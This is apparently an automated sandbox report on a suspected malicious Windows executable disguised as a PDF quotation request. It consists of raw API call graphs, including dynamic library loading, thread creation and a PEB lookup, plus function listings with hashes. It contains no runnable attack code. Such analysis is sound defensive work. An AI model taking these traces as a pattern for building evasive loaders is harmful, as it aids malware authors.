API calls __getptd_noexit 87776->87824 87778 41d839 87777->87778 87783 41d873 87777->87783 87826 417f8a 46 API calls __getptd_noexit 87778->87826 87781 41d817 87825 417f77 46 API calls __getptd_noexit 87781->87825 87782 41d83e 87827 417f77 46 API calls __getptd_noexit 87782->87827 87799 41ae56 87783->87799 87787 41d81f ___lock_fhandle 87787->87765 87788 41d846 87828 417f25 10 API calls __wcsicoll 87788->87828 87789 41d879 87791 41d893 87789->87791 87792 41d887 87789->87792 87829 417f77 46 API calls __getptd_noexit 87791->87829 87809 41d762 87792->87809 87795 41d88d 87830 41d8ba LeaveCriticalSection __unlock_fhandle 87795->87830 87797->87755 87798->87756 87800 41ae62 ___lock_fhandle 87799->87800 87801 41aebc 87800->87801 87802 4182cb __lock 46 API calls 87800->87802 87803 41aec1 EnterCriticalSection 87801->87803 87805 41aede ___lock_fhandle 87801->87805 87804 41ae8e 87802->87804 87803->87805 87806 41aeaa 87804->87806 87807 41ae97 InitializeCriticalSectionAndSpinCount 87804->87807 87805->87789 87808 41aeec ___lock_fhandle LeaveCriticalSection 87806->87808 87807->87806 87808->87801 87810 41aded __lseeki64_nolock 46 API calls 87809->87810 87811 41d772 87810->87811 87812 41d7c8 87811->87812 87813 41d7a6 87811->87813 87815 41aded __lseeki64_nolock 46 API calls 87811->87815 87814 41ad67 __free_osfhnd 47 API calls 87812->87814 87813->87812 87816 41aded __lseeki64_nolock 46 API calls 87813->87816 87817 41d7d0 87814->87817 87819 41d79d 87815->87819 87820 41d7b2 CloseHandle 87816->87820 87818 41d7f2 87817->87818 87821 417f9d __dosmaperr 46 API calls 87817->87821 87818->87795 87822 41aded __lseeki64_nolock 46 API calls 87819->87822 87820->87812 87823 41d7be GetLastError 87820->87823 87821->87818 87822->87813 87823->87812 87824->87781 87825->87787 87826->87782 87827->87788 87828->87787 87829->87795 87830->87787 87832 414c82 ___lock_fhandle 87831->87832 87833 414cc3 87832->87833 87834 414c96 __recalloc 87832->87834 87835 414cbb ___lock_fhandle 87832->87835 87836 415471 __lock_file 47 API calls 87833->87836 87858 417f77 46 API calls __getptd_noexit 87834->87858 87835->87513 87837 414ccb 87836->87837 87844 414aba 87837->87844 87840 414cb0 87859 417f25 10 API calls __wcsicoll 87840->87859 87845 414af2 87844->87845 87848 414ad8 __recalloc 87844->87848 87860 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87845->87860 87846 414ae2 87911 417f77 46 API calls __getptd_noexit 87846->87911 87848->87845 87848->87846 87857 414b2d 87848->87857 87851 414c38 __recalloc 87914 417f77 46 API calls __getptd_noexit 87851->87914 87852 414139 __flswbuf 46 API calls 87852->87857 87856 414ae7 87912 417f25 10 API calls __wcsicoll 87856->87912 87857->87845 87857->87851 87857->87852 87861 41dfcc 87857->87861 87891 41d8f3 87857->87891 87913 41e0c2 46 API calls 3 library calls 87857->87913 87858->87840 87859->87835 87860->87835 87862 41dfd8 ___lock_fhandle 87861->87862 87863 41dfe0 87862->87863 87864 41dffb 87862->87864 87866 417f8a __write_nolock 46 API calls 87863->87866 87865 41e007 87864->87865 87870 41e041 87864->87870 87867 417f8a __write_nolock 46 API calls 87865->87867 87868 41dfe5 87866->87868 87869 41e00c 87867->87869 87871 417f77 __wcsicoll 46 API calls 87868->87871 87872 417f77 __wcsicoll 46 API calls 87869->87872 87873 41e063 87870->87873 87874 41e04e 87870->87874 87883 41dfed ___lock_fhandle 87871->87883 87886 41e014 87872->87886 87875 41ae56 ___lock_fhandle 48 API calls 87873->87875 87876 417f8a __write_nolock 46 API calls 87874->87876 87877 41e069 87875->87877 87878 41e053 87876->87878 87879 41e077 87877->87879 87880 41e08b 87877->87880 87882 417f77 __wcsicoll 46 API calls 87878->87882 87884 41da15 __read_nolock 56 API calls 87879->87884 87885 417f77 __wcsicoll 46 API calls 87880->87885 87881 417f25 __wcsicoll 10 API calls 87881->87883 87882->87886 87883->87857 87887 41e083 87884->87887 87888 41e090 87885->87888 87886->87881 87890 41e0ba __read LeaveCriticalSection 87887->87890 87889 417f8a __write_nolock 46 API calls 87888->87889 87889->87887 87890->87883 87892 41d900 87891->87892 87896 41d915 87891->87896 87893 417f77 __wcsicoll 46 API calls 87892->87893 87894 41d905 87893->87894 87895 417f25 __wcsicoll 10 API calls 87894->87895 87902 41d910 87895->87902 87897 41d94a 87896->87897 87898 420603 __getbuf 46 API calls 87896->87898 87896->87902 87899 414139 __flswbuf 46 API calls 87897->87899 87898->87897 87900 41d95e 87899->87900 87901 41dfcc __read 59 API calls 87900->87901 87903 41d965 87901->87903 87902->87857 87903->87902 87904 414139 __flswbuf 46 API calls 87903->87904 87905 41d988 87904->87905 87905->87902 87906 414139 __flswbuf 46 API calls 87905->87906 87907 41d994 87906->87907 87907->87902 87908 414139 __flswbuf 46 API calls 87907->87908 87909 41d9a1 87908->87909 87910 414139 __flswbuf 46 API calls 87909->87910 87910->87902 87911->87856 87912->87845 87913->87857 87914->87856 87918 4148b3 GetSystemTimeAsFileTime __aulldiv 87915->87918 87917 442c6b 87917->87516 87918->87917 87919->87523 87920->87529 87921->87529 87923 4339d2 FindFirstFileW 87922->87923 87924 4339f5 87922->87924 87925 4339e3 87923->87925 87926 4339ea FindClose 87923->87926 87924->87422 87925->87422 87926->87924 88182 443d73 88146->88182 88150 46eac5 88149->88150 88151 46eaac 88149->88151 88212 45f72f 54 API calls 88150->88212 88152 46eab1 88151->88152 88153 46eabb 88151->88153 88196 4689aa 88152->88196 88204 46ea4a 88153->88204 88155 46eaca 88155->87147 88158 46eab6 88158->87147 88159 46eac0 88159->87147 88160->87124 88162 40da20 CloseHandle 88161->88162 88163 40de4e 88162->88163 88279 40f110 88163->88279 88166 4264fa 88168 40de84 88307 40e080 SetFilePointerEx SetFilePointerEx 88168->88307 88170 40de8b 88308 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88170->88308 88172 40de90 88172->87130 88172->87138 88173->87141 88174->87143 88175->87148 88176->87150 88178 40da37 88177->88178 88179 40da29 88177->88179 88178->88179 88180 40da3c CloseHandle 88178->88180 88179->87156 88180->87156 88181->87154 88187 40df90 88182->88187 88185 40df90 2 API calls 88186 443da5 88185->88186 88186->87135 88188 40dfa2 88187->88188 88189 425e30 88188->88189 88190 40e01b SetFilePointerEx 88188->88190 88193 40dff3 88188->88193 88195 40e050 SetFilePointerEx 88189->88195 88194 40e050 SetFilePointerEx 88190->88194 88193->88185 88194->88193 88195->88193 88213 40d370 88196->88213 88201 4689e3 88201->88158 88203 4689d5 88203->88158 88205 40d370 52 API calls 88204->88205 88206 46ea59 88205->88206 88207 44c228 54 API calls 88206->88207 88208 46ea67 88207->88208 88209 46ea83 88208->88209 88255 403af0 MultiByteToWideChar 88208->88255 88209->88159 88211 46ea75 88211->88159 88212->88155 88214 4115d7 52 API calls 88213->88214 88215 40d385 88214->88215 88216 4115d7 52 API calls 88215->88216 88217 40d391 88216->88217 88218 44c228 88217->88218 88225 444d96 88218->88225 88220 44c26d 88220->88201 88224 460a29 54 API calls ctype 88220->88224 88222 44c23a 88222->88220 88231 443ec4 88222->88231 88234 44c1b5 88222->88234 88224->88203 88226 444da3 88225->88226 88227 444dc0 88226->88227 88243 434a13 52 API calls 88226->88243 88227->88222 88229 444db2 88230 4115d7 52 API calls 88229->88230 88230->88227 88244 403910 88231->88244 88235 44c1c2 88234->88235 88236 44c1c6 88235->88236 88237 44c1ff 88235->88237 88254 434a13 52 API calls 88236->88254 88250 44c0a3 88237->88250 88240 44c1e7 _memmove 88240->88222 88241 44c1d2 88242 4115d7 52 API calls 88241->88242 88242->88240 88243->88229 88245 40397f 88244->88245 88249 40391a 88244->88249 88247 40e050 SetFilePointerEx 88245->88247 88246 403940 88246->88222 88247->88249 88248 403950 ReadFile 88248->88246 88248->88249 88249->88246 88249->88248 88251 44c0ba 88250->88251 88253 44c189 ctype _memmove 88250->88253 88252 4115d7 52 API calls 88251->88252 88252->88253 88253->88240 88254->88241 88256 427ca3 88255->88256 88257 403b16 88255->88257 88259 403350 52 API calls 88256->88259 88258 4115d7 52 API calls 88257->88258 88260 403b2f MultiByteToWideChar 88258->88260 88261 427cab 88259->88261 88264 403b70 88260->88264 88261->88261 88263 403b52 ctype 88263->88211 88265 403bbd 88264->88265 88266 403b7d 88264->88266 88267 40c600 52 API calls 88265->88267 88266->88265 88269 403b86 88266->88269 88268 403bc8 88267->88268 88268->88263 88270 4275e3 88269->88270 88271 403b92 88269->88271 88273 4013a0 52 API calls 88270->88273 88278 403bd0 52 API calls ctype 88271->88278 88275 4275ea 88273->88275 88274 403b97 _memmove 88274->88263 88276 4115d7 52 API calls 88275->88276 88277 42760c 88276->88277 88278->88274 88280 40f125 CreateFileW 88279->88280 88281 42630c 88279->88281 88283 40de74 88280->88283 88282 426311 CreateFileW 88281->88282 88281->88283 88282->88283 88284 426337 88282->88284 88283->88166 88287 40dea0 88283->88287 88285 40df90 2 API calls 88284->88285 88286 426342 88285->88286 88286->88283 88289 40df1c 88287->88289 88290 40debc 88287->88290 88288 40df7b 88288->88168 88289->88288 88299 40df90 2 API calls 88289->88299 88306 40df5b ctype 88289->88306 88290->88288 88290->88289 88291 40df90 2 API calls 88290->88291 88292 40def7 88291->88292 88293 4115d7 52 API calls 88292->88293 88294 40df01 88293->88294 88309 40f0a0 88294->88309 88295 40df90 2 API calls 88295->88288 88298 403910 2 API calls 88298->88289 88300 4264a3 88299->88300 88301 443d73 2 API calls 88300->88301 88302 4264a9 88301->88302 88303 4115d7 52 API calls 88302->88303 88304 4264b1 88303->88304 88305 403910 2 API calls 88304->88305 88305->88306 88306->88295 88307->88170 88308->88172 88310 4115d7 52 API calls 88309->88310 88311 40df0c 88310->88311 88311->88298 88313 4115d7 52 API calls 88312->88313 88314 4028b3 88313->88314 88315 4115d7 52 API calls 88314->88315 88336 4028c5 ctype _memmove 88315->88336 88317 402b1e ctype 88317->87162 88318 427d62 88321 403350 52 API calls 88318->88321 88320 402aeb ctype 88328 42802b ctype 88320->88328 88355 402780 52 API calls 2 library calls 88320->88355 88330 427d6b 88321->88330 88322 402bb6 88356 403060 53 API calls 88322->88356 88324 402bca 88325 427f63 88324->88325 88326 402bd4 88324->88326 88362 460879 92 API calls 3 library calls 88325->88362 88357 402780 52 API calls 2 library calls 88326->88357 88327 403350 52 API calls 88327->88336 88353 427f2c 88330->88353 88360 403020 52 API calls _memmove 88330->88360 88333 402bdf 88333->87162 88335 427fd5 88364 460879 92 API calls 3 library calls 88335->88364 88336->88318 88336->88320 88336->88322 88336->88327 88336->88335 88340 402f00 52 API calls 88336->88340 88341 4013a0 52 API calls 88336->88341 88342 428000 88336->88342 88345 4026f0 52 API calls 88336->88345 88346 427fa5 88336->88346 88351 4115d7 52 API calls 88336->88351 88352 402780 52 API calls 88336->88352 88336->88353 88354 4031b0 63 API calls 88336->88354 88358 402f80 92 API calls _memmove 88336->88358 88359 402280 52 API calls 88336->88359 88337 427f48 88337->88317 88340->88336 88341->88336 88366 460879 92 API calls 3 library calls 88342->88366 88343 427fe4 88365 402780 52 API calls 2 library calls 88343->88365 88350 402a85 CharUpperBuffW 88345->88350 88363 402780 52 API calls 2 library calls 88346->88363 88350->88336 88351->88336 88352->88336 88361 460879 92 API calls 3 library calls 88353->88361 88354->88336 88355->88317 88356->88324 88357->88333 88358->88336 88359->88336 88360->88330 88361->88337 88362->88337 88363->88317 88364->88343 88365->88337 88366->88317 88367->87190 88368->87211 88369->87177 88370->87198 88371->87203 88372->86966 88373->86767 88374->86767 88375->86767 88376->86767 88377->86767 88378->86751 88379->86751 88380->86766 88381->86749 88382->86788 88383->86788 88384->86788 88385->86782 88386->86788 88387->86788 88388 425b2b 88393 40f000 88388->88393 88392 425b3a 88394 4115d7 52 API calls 88393->88394 88395 40f007 88394->88395 88396 4276ea 88395->88396 88402 40f030 88395->88402 88401 41130a 51 API calls __cinit 88401->88392 88403 40f039 88402->88403 88405 40f01a 88402->88405 88432 41130a 51 API calls __cinit 88403->88432 88406 40e500 88405->88406 88407 40bc70 52 API calls 88406->88407 88408 40e515 GetVersionExW 88407->88408 88409 402160 52 API calls 88408->88409 88410 40e557 88409->88410 88433 40e660 88410->88433 88415 427674 88420 4276c6 GetSystemInfo 88415->88420 88418 40e5e0 88421 4276d5 GetSystemInfo 88418->88421 88447 40efd0 88418->88447 88419 40e5cd GetCurrentProcess 88454 40ef20 LoadLibraryA GetProcAddress 88419->88454 88420->88421 88425 40e629 88451 40ef90 88425->88451 88428 40e641 FreeLibrary 88429 40e644 88428->88429 88430 40e653 FreeLibrary 88429->88430 88431 40e656 88429->88431 88430->88431 88431->88401 88432->88405 88434 40e667 88433->88434 88435 42761d 88434->88435 88436 40c600 52 API calls 88434->88436 88437 40e55c 88436->88437 88438 40e680 88437->88438 88439 40e687 88438->88439 88440 427616 88439->88440 88441 40c600 52 API calls 88439->88441 88442 40e566 88441->88442 88442->88415 88443 40ef60 88442->88443 88444 40e5c8 88443->88444 88445 40ef66 LoadLibraryA 88443->88445 88444->88418 88444->88419 88445->88444 88446 40ef77 GetProcAddress 88445->88446 88446->88444 88448 40e620 88447->88448 88449 40efd6 LoadLibraryA 88447->88449 88448->88420 88448->88425 88449->88448 88450 40efe7 GetProcAddress 88449->88450 88450->88448 88455 40efb0 LoadLibraryA GetProcAddress 88451->88455 88453 40e632 GetNativeSystemInfo 88453->88428 88453->88429 88454->88418 88455->88453 88456 425b6f 88461 40dc90 88456->88461 88460 425b7e 88462 40bc70 52 API calls 88461->88462 88463 40dd03 88462->88463 88470 40f210 88463->88470 88465 426a97 88467 40dd96 88467->88465 88468 40ddb7 88467->88468 88473 40dc00 52 API calls 2 library calls 88467->88473 88469 41130a 51 API calls __cinit 88468->88469 88469->88460 88474 40f250 RegOpenKeyExW 88470->88474 88472 40f230 88472->88467 88473->88467 88475 425e17 88474->88475 88476 40f275 RegQueryValueExW 88474->88476 88475->88472 88477 40f2c3 RegCloseKey 88476->88477 88478 40f298 88476->88478 88477->88472 88479 40f2a9 RegCloseKey 88478->88479 88480 425e1d 88478->88480 88479->88472 88481 416454 88518 416c70 88481->88518 88483 416460 GetStartupInfoW 88484 416474 88483->88484 88519 419d5a HeapCreate 88484->88519 88486 4164cd 88487 4164d8 88486->88487 88603 41642b 46 API calls 3 library calls 88486->88603 88520 417c20 GetModuleHandleW 88487->88520 88490 4164de 88491 4164e9 __RTC_Initialize 88490->88491 88604 41642b 46 API calls 3 library calls 88490->88604 88539 41aaa1 GetStartupInfoW 88491->88539 88495 416503 GetCommandLineW 88552 41f584 GetEnvironmentStringsW 88495->88552 88499 416513 88558 41f4d6 GetModuleFileNameW 88499->88558 88501 41651d 88502 416528 88501->88502 88606 411924 46 API calls 3 library calls 88501->88606 88562 41f2a4 88502->88562 88505 41652e 88506 416539 88505->88506 88607 411924 46 API calls 3 library calls 88505->88607 88576 411703 88506->88576 88509 416541 88511 41654c __wwincmdln 88509->88511 88608 411924 46 API calls 3 library calls 88509->88608 88580 40d6b0 88511->88580 88518->88483 88519->88486 88521 417c34 88520->88521 88522 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88520->88522 88611 4178ff 49 API calls _free 88521->88611 88524 417c87 TlsAlloc 88522->88524 88527 417cd5 TlsSetValue 88524->88527 88528 417d96 88524->88528 88525 417c39 88525->88490 88527->88528 88529 417ce6 __init_pointers 88527->88529 88528->88490 88612 418151 InitializeCriticalSectionAndSpinCount 88529->88612 88531 417d91 88620 4178ff 49 API calls _free 88531->88620 88533 417d2a 88533->88531 88613 416b49 88533->88613 88536 417d76 88619 41793c 46 API calls 4 library calls 88536->88619 88538 417d7e GetCurrentThreadId 88538->88528 88540 416b49 __calloc_crt 46 API calls 88539->88540 88541 41aabf 88540->88541 88543 416b49 __calloc_crt 46 API calls 88541->88543 88546 41abb4 88541->88546 88547 4164f7 88541->88547 88548 41ac34 88541->88548 88542 41ac6a GetStdHandle 88542->88548 88543->88541 88544 41acce SetHandleCount 88544->88547 88545 41ac7c GetFileType 88545->88548 88546->88548 88549 41abe0 GetFileType 88546->88549 88550 41abeb InitializeCriticalSectionAndSpinCount 88546->88550 88547->88495 88605 411924 46 API calls 3 library calls 88547->88605 88548->88542 88548->88544 88548->88545 88551 41aca2 InitializeCriticalSectionAndSpinCount 88548->88551 88549->88546 88549->88550 88550->88546 88550->88547 88551->88547 88551->88548 88553 41f595 88552->88553 88554 41f599 88552->88554 88553->88499 88555 416b04 __malloc_crt 46 API calls 88554->88555 88556 41f5bb _memmove 88555->88556 88557 41f5c2 FreeEnvironmentStringsW 88556->88557 88557->88499 88559 41f50b _wparse_cmdline 88558->88559 88560 416b04 __malloc_crt 46 API calls 88559->88560 88561 41f54e _wparse_cmdline 88559->88561 88560->88561 88561->88501 88563 41f2bc _wcslen 88562->88563 88567 41f2b4 88562->88567 88564 416b49 __calloc_crt 46 API calls 88563->88564 88569 41f2e0 _wcslen 88564->88569 88565 41f336 88566 413748 _free 46 API calls 88565->88566 88566->88567 88567->88505 88568 416b49 __calloc_crt 46 API calls 88568->88569 88569->88565 88569->88567 88569->88568 88570 41f35c 88569->88570 88573 41f373 88569->88573 88630 41ef12 46 API calls __wcsicoll 88569->88630 88571 413748 _free 46 API calls 88570->88571 88571->88567 88631 417ed3 88573->88631 88575 41f37f 88575->88505 88577 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88576->88577 88579 411750 __IsNonwritableInCurrentImage 88577->88579 88649 41130a 51 API calls __cinit 88577->88649 88579->88509 88581 42e2f3 88580->88581 88582 40d6cc 88580->88582 88583 408f40 VariantClear 88582->88583 88584 40d707 88583->88584 88650 40ebb0 88584->88650 88587 40d737 88653 411951 88587->88653 88592 40d751 88665 40f4e0 SystemParametersInfoW SystemParametersInfoW 88592->88665 88594 40d75f 88666 40d590 GetCurrentDirectoryW 88594->88666 88603->88487 88604->88491 88611->88525 88612->88533 88615 416b52 88613->88615 88616 416b8f 88615->88616 88617 416b70 Sleep 88615->88617 88621 41f677 88615->88621 88616->88531 88616->88536 88618 416b85 88617->88618 88618->88615 88618->88616 88619->88538 88620->88528 88622 41f683 88621->88622 88626 41f69e _malloc 88621->88626 88623 41f68f 88622->88623 88622->88626 88629 417f77 46 API calls __getptd_noexit 88623->88629 88625 41f6b1 HeapAlloc 88625->88626 88628 41f6d8 88625->88628 88626->88625 88626->88628 88627 41f694 88627->88615 88628->88615 88629->88627 88630->88569 88634 417daa 88631->88634 88635 417dc9 __recalloc __call_reportfault 88634->88635 88636 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 88635->88636 88637 417eb5 __call_reportfault 88636->88637 88640 41a208 88637->88640 88639 417ed1 GetCurrentProcess TerminateProcess 88639->88575 88641 41a210 88640->88641 88642 41a212 IsDebuggerPresent 88640->88642 88641->88639 88648 41fe19 88642->88648 88645 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 88646 421ff0 __call_reportfault 88645->88646 88647 421ff8 GetCurrentProcess TerminateProcess 88645->88647 88646->88647 88647->88639 88648->88645 88649->88579 88706 40ebd0 88650->88706 88654 4182cb __lock 46 API calls 88653->88654 88655 41195e 88654->88655 88710 4181f2 LeaveCriticalSection 88655->88710 88657 40d748 88658 4119b0 88657->88658 88659 4119d6 88658->88659 88660 4119bc 88658->88660 88659->88592 88660->88659 88711 417f77 46 API calls __getptd_noexit 88660->88711 88662 4119c6 88712 417f25 10 API calls __wcsicoll 88662->88712 88664 4119d1 88664->88592 88665->88594 88713 401f20 88666->88713 88705 40ec00 LoadLibraryA GetProcAddress 88705->88587 88707 40d72e 88706->88707 88708 40ebd6 LoadLibraryA 88706->88708 88707->88587 88707->88705 88708->88707 88709 40ebe7 GetProcAddress 88708->88709 88709->88707 88710->88657 88711->88662 88712->88664 88823 40e6e0 88713->88823 88717 401f41 GetModuleFileNameW 88841 410100 88717->88841 88719 401f5c 88853 410960 88719->88853 88722 401b10 52 API calls 88723 401f81 88722->88723 88724 401980 53 API calls 88723->88724 88725 401f8e 88724->88725 88726 408f40 VariantClear 88725->88726 88727 401f9d 88726->88727 88728 401b10 52 API calls 88727->88728 88729 401fb4 88728->88729 88730 401980 53 API calls 88729->88730 88731 401fc3 88730->88731 88732 401b10 52 API calls 88731->88732 88733 401fd2 88732->88733 88734 40c2c0 52 API calls 88733->88734 88735 401fe1 88734->88735 88736 40bc70 52 API calls 88735->88736 88737 401ff3 88736->88737 88856 401a10 88737->88856 88739 401ffe 88863 4114ab 88739->88863 88824 40bc70 52 API calls 88823->88824 88825 401f31 88824->88825 88826 402560 88825->88826 88827 40256d __write_nolock 88826->88827 88828 402160 52 API calls 88827->88828 88830 402593 88828->88830 88832 4025bd 88830->88832 88872 401c90 88830->88872 88831 4026f0 52 API calls 88831->88832 88832->88831 88835 401b10 52 API calls 88832->88835 88837 401c90 52 API calls 88832->88837 88840 4026a7 88832->88840 88875 40d7c0 52 API calls 2 library calls 88832->88875 88833 4026db 88833->88717 88834 401b10 52 API calls 88836 4026d1 88834->88836 88835->88832 88876 40d7c0 52 API calls 2 library calls 88836->88876 88837->88832 88840->88833 88840->88834 88842 40f760 128 API calls 88841->88842 88843 410110 88842->88843 88844 410118 88843->88844 88877 4528bd 88843->88877 88844->88719 88846 42805d 88847 42806a 88846->88847 88848 431e58 82 API calls 88846->88848 88849 413748 _free 46 API calls 88847->88849 88848->88847 88850 428078 88849->88850 88851 431e58 82 API calls 88850->88851 88852 428084 88851->88852 88852->88719 88854 4115d7 52 API calls 88853->88854 88855 401f74 88854->88855 88855->88722 88857 401a30 88856->88857 88858 401a17 88856->88858 88860 402160 52 API calls 88857->88860 88859 401a2d 88858->88859 88914 403c30 52 API calls _memmove 88858->88914 88859->88739 88862 401a3d 88860->88862 88862->88739 88873 4026f0 52 API calls 88872->88873 88874 401c97 88873->88874 88874->88830 88875->88832 88876->88833 88878 4150d1 _fseek 81 API calls 88877->88878 88879 452930 88878->88879 88880 452719 90 API calls 88879->88880 88881 452944 88880->88881 88882 452948 88881->88882 88883 414d04 __fread_nolock 61 API calls 88881->88883 88882->88846 88884 452966 88883->88884 88885 414d04 __fread_nolock 61 API calls 88884->88885 88886 452976 88885->88886 88887 414d04 __fread_nolock 61 API calls 88886->88887 88888 45298f 88887->88888 88889 414d04 __fread_nolock 61 API calls 88888->88889 88890 4529aa 88889->88890 88891 4150d1 _fseek 81 API calls 88890->88891 88892 4529c4 88891->88892 88893 4135bb _malloc 46 API calls 88892->88893 88894 4529cf 88893->88894 88895 4135bb _malloc 46 API calls 88894->88895 88896 4529db 88895->88896 88897 414d04 __fread_nolock 61 API calls 88896->88897 88898 4529ec 88897->88898 88899 44afef GetSystemTimeAsFileTime 88898->88899 88900 452a00 88899->88900 88901 452a36 88900->88901 88902 452a13 88900->88902 88904 452aa5 88901->88904 88905 452a3c 88901->88905 88903 413748 _free 46 API calls 88902->88903 88907 452a1c 88903->88907 88906 413748 _free 46 API calls 88904->88906 88908 44b1a9 117 API calls 88905->88908 88914->88859 89018 42d154 89019 480a8d 261 API calls 89018->89019 89020 42d161 89019->89020 89021 480a8d 261 API calls 89020->89021 89021->89020 89022 40b2b9 89025 40ccd0 89022->89025 89024 40b2c4 89065 40cc70 89025->89065 89027 40ccf3 89028 42c3bb 89027->89028 89030 40cd1b 89027->89030 89053 40cd8a ctype 89027->89053 89087 45e737 90 API calls 3 library calls 89028->89087 89034 40cd30 89030->89034 89054 40cdad 89030->89054 89031 40cd72 89075 402780 52 API calls 2 library calls 89031->89075 89034->89031 89034->89053 89074 402780 52 API calls 2 library calls 89034->89074 89035 40cd80 89076 40e7d0 400 API calls 89035->89076 89036 40ce40 89077 40ceb0 53 API calls 89036->89077 89039 40ce53 89040 408f40 VariantClear 89039->89040 89041 40ce5b 89040->89041 89043 408f40 VariantClear 89041->89043 89042 42c3a0 89085 45e737 90 API calls 3 library calls 89042->89085 89046 40ce63 89043->89046 89045 42c31a 89078 45e737 90 API calls 3 library calls 89045->89078 89046->89024 89048 42c3ad 89086 452670 VariantClear 89048->89086 89049 42c327 89079 452670 VariantClear 89049->89079 89051 40cc70 261 API calls 89051->89054 89053->89024 89054->89036 89054->89042 89054->89045 89054->89051 89055 42c335 89054->89055 89056 42c370 89054->89056 89060 42c343 89054->89060 89080 452670 VariantClear 89055->89080 89083 45e737 90 API calls 3 library calls 89056->89083 89059 42c392 89084 452670 VariantClear 89059->89084 89081 45e737 90 API calls 3 library calls 89060->89081 89063 42c362 89082 452670 VariantClear 89063->89082 89066 40a780 261 API calls 89065->89066 89067 40cc96 89066->89067 89068 42bd0e 89067->89068 89070 40cc9e 89067->89070 89069 408f40 VariantClear 89068->89069 89071 42bd16 89069->89071 89072 408f40 VariantClear 89070->89072 89071->89027 89073 40ccb8 89072->89073 89073->89027 89074->89034 89075->89035 89076->89053 89077->89039 89078->89049 89079->89053 89080->89053 89081->89063 89082->89053 89083->89059 89084->89053 89085->89048 89086->89053 89087->89053 89088 425b5e 89093 40c7f0 89088->89093 89092 425b6d 89128 40db10 52 API calls 89093->89128 89095 40c82a 89129 410ab0 6 API calls 89095->89129 89097 40c86d 89098 40bc70 52 API calls 89097->89098 89099 40c877 89098->89099 89100 40bc70 52 API calls 89099->89100 89101 40c881 89100->89101 89102 40bc70 52 API calls 89101->89102 89103 40c88b 89102->89103 89104 40bc70 52 API calls 89103->89104 89105 40c8d1 89104->89105 89106 40bc70 52 API calls 89105->89106 89107 40c991 89106->89107 89130 40d2c0 52 API calls 89107->89130 89109 40c99b 89131 40d0d0 53 API calls 89109->89131 89111 40c9c1 89112 40bc70 52 API calls 89111->89112 89113 40c9cb 89112->89113 89132 40e310 53 API calls 89113->89132 89115 40ca28 89116 408f40 VariantClear 89115->89116 89117 40ca30 89116->89117 89118 408f40 VariantClear 89117->89118 89119 40ca38 GetStdHandle 89118->89119 89120 429630 89119->89120 89121 40ca87 89119->89121 89120->89121 89122 429639 89120->89122 89127 41130a 51 API calls __cinit 89121->89127 89133 4432c0 57 API calls 89122->89133 89124 429641 89134 44b6ab CreateThread 89124->89134 89126 42964f CloseHandle 89126->89121 89127->89092 89128->89095 89129->89097 89130->89109 89131->89111 89132->89115 89133->89124 89134->89126 89135 44b5cb 58 API calls 89134->89135 89136 32623f8 89137 3260048 GetPEB 89136->89137 89138 32624d8 89137->89138 89150 32622e8 89138->89150 89151 32622f1 Sleep 89150->89151 89152 32622ff 89151->89152

                                                                    Executed Functions

                                                                    Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 004096C1
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0040970C
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                    • _memmove.LIBCMT ref: 00409D96
                                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                                    • _memmove.LIBCMT ref: 004297E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2383988440-0
                                                                    • Opcode ID: f87744838e7cdf90bb43d588a11a01879f5527508e4be11534881a08926f1cb6
                                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                    • Opcode Fuzzy Hash: f87744838e7cdf90bb43d588a11a01879f5527508e4be11534881a08926f1cb6
                                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                    Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?), ref: 00401F4C
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
